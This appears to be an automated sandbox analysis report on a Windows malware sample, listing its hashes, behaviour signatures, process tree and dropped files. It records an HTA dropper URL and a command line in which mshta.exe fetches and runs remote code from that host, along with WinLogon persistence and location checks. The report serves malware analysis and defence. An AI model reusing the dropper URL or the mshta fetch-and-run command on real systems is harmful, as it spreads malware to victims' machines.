Analysis

  • max time kernel
    9s
  • max time network
    11s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240802-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
  • submitted
    20-09-2024 16:26

Errors

Reason
Machine shutdown

General

  • Target

    edfbd3ed00c16f0b88e016ef67a1c954_JaffaCakes118.exe

  • Size

    599KB

  • MD5

    edfbd3ed00c16f0b88e016ef67a1c954

  • SHA1

    445161c71b0fb30f56650e0a9572b28c3af1e259

  • SHA256

    540ff7bfb7db15e5486ac9c93d7c05624973f73982f8b661f7eb99c40f8f4f82

  • SHA512

    6edcf28632161c02c8d6f2fde7fdb8376f5ac0a9e8011cdb9475290bab275604a3613524137bb6f94097b04e0aff2c1269f5705a75114f48318716d2866fc791

  • SSDEEP

    12288:X/82OHgu0FYGTdU0pFQdQPi5ucr+p4SBz0jTcrGUZ4CYs0cLZK:FuUYGxU6gQaIcr+X0j4SZCYV

Malware Config

Extracted

Language
hta
Source
URLs
hta.dropper

http://raptopreport.com/inst.php?id=skytraf01

Signatures

  • Modifies WinLogon for persistence 2 TTPs 1 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • UPX packed file 2 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 3 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Modifies data under HKEY_USERS 15 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 3 IoCs
  • Suspicious use of WriteProcessMemory 6 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\edfbd3ed00c16f0b88e016ef67a1c954_JaffaCakes118.exe
    "C:\Users\Admin\AppData\Local\Temp\edfbd3ed00c16f0b88e016ef67a1c954_JaffaCakes118.exe"
    1⤵
    • Modifies WinLogon for persistence
    • Checks computer location settings
    • System Location Discovery: System Language Discovery
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:3084
    • C:\Windows\SysWOW64\mshta.exe
      "C:\Windows\System32\mshta.exe" http://raptopreport.com/inst.php?id=skytraf01
      2⤵
      • System Location Discovery: System Language Discovery
      PID:1856
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\agtyjkj.bat" "
      2⤵
      • System Location Discovery: System Language Discovery
      PID:4892
  • C:\Windows\system32\LogonUI.exe
    "LogonUI.exe" /flags:0x4 /state0:0xa39a3855 /state1:0x41c64e6d
    1⤵
    • Modifies data under HKEY_USERS
    • Suspicious use of SetWindowsHookEx
    PID:5096

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Roaming\agtyjkj.bat

    Filesize

    262B

    MD5

    e83829fb41dc0ce6f22ae74907f2b331

    SHA1

    c04f9d2dba775643f6ebb3c5225aa57e3e9d11a7

    SHA256

    7ab31e99dd2c03913be4e30534ef879e1612f50932a9e3661d7d706dcc96cfd2

    SHA512

    152ee1436d042ac83797dc6e3ddb9b8b353d97d250103350e89d8df5eb376e8dcc59ba1e9b51aef5b766570ab736d74e134c5dbe25bbc4feab85987604dd62df

  • memory/3084-0-0x0000000000400000-0x00000000006C1000-memory.dmp

    Filesize

    2.8MB

  • memory/3084-1-0x0000000000CE0000-0x0000000000CE1000-memory.dmp

    Filesize

    4KB

  • memory/3084-8-0x0000000000400000-0x00000000006C1000-memory.dmp

    Filesize

    2.8MB